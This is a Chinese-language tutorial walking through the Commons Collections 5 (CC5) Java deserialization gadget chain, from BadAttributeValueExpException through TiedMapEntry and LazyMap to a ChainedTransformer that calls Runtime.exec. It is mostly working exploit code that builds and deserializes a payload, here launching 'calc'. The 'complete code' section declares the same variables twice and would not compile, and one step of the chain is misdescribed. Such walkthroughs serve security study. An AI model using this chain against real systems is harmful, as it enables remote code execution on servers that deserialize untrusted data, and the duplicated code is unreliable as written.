CC5

第一步

分析流程
BadAttributeValueExpException的readObject是入口，然后我们在readobject里面看到tostring

    private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
    ObjectInputStream.GetField gf = ois.readFields();
    Object valObj = gf.get("val", null);

    if (valObj == null) {
        val = null;
    } else if (valObj instanceof String) {
        val= valObj;
    } else if (System.getSecurityManager() == null
            || valObj instanceof Long
            || valObj instanceof Integer
            || valObj instanceof Float
            || valObj instanceof Double
            || valObj instanceof Byte
            || valObj instanceof Short
            || valObj instanceof Boolean) {
        val = valObj.toString();
    } else { // the serialized object is from a version without JDK-8019292 fix
        val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
    }
}

调用TiedMapEntry的toString,他会调用getKey()

public String toString() {
    return getKey() + "=" + getValue();
}

getValue会调用get

 public Object getValue() {
    return map.get(key);
}

LazyMap的get函数会调用transform

 public Object get(Object key) {
    // create value for key if key is not currently in the map
    if (map.containsKey(key) == false) {
        Object value = factory.transform(key);
        map.put(key, value);
        return value;
    }
    return map.get(key);
}

后面其实就是cc1，我们就不分析了。

第二步

给他们赋值

  Transformer[] transformers = {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> hashMap = new HashMap<>();
    Map decorateMap = LazyMap.decorate(hashMap,chainedTransformer);
    TiedMapEntry tiedMapEntry = new TiedMapEntry(decorateMap ,"1");
    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(tiedMapEntry);

这样就能调用了，但是他不到readobject就会被启动所以我们给他传参为nullBadAttributeValueExpException(null)后面再反射调用传参

BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Class c = Class.forName("javax.management.BadAttributeValueExpException");
Field field = c.getDeclaredField("val");
field.setAccessible(true);
field.set(badAttributeValueExpException, tiedMapEntry)

执行代码

   Transformer[] transformers = {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> hashMap = new HashMap<>();
    Map decorateMap = LazyMap.decorate(hashMap,chainedTransformer);
    TiedMapEntry tiedMapEntry = new TiedMapEntry(decorateMap ,"1");
    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);//第一步
    Class c = Class.forName("javax.management.BadAttributeValueExpException");
    Field field = c.getDeclaredField("val");
    field.setAccessible(true);
    field.set(badAttributeValueExpException, tiedMapEntry);
    serialize(badAttributeValueExpException);
    unserialize("ser.bin");

完整代码

public class cc5 {
public static void main(String[] args) throws Exception {
    Transformer[] transformers = {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> hashMap = new HashMap<>();
    Map decorateMap = LazyMap.decorate(hashMap,chainedTransformer);
    TiedMapEntry tiedMapEntry = new TiedMapEntry(decorateMap ,"1");
    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(tiedMapEntry);//第一步


    Transformer[] transformers = {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
            new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
            new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> hashMap = new HashMap<>();
    Map decorateMap = LazyMap.decorate(hashMap,chainedTransformer);
    TiedMapEntry tiedMapEntry = new TiedMapEntry(decorateMap ,"1");
    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);//第一步
    Class c = Class.forName("javax.management.BadAttributeValueExpException");
    Field field = c.getDeclaredField("val");
    field.setAccessible(true);
    field.set(badAttributeValueExpException, tiedMapEntry);
    serialize(badAttributeValueExpException);
    unserialize("ser.bin");//第二步

}
public static void serialize(Object obj) throws IOException {
    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
    Object obj = ois.readObject();
    return obj;
}
}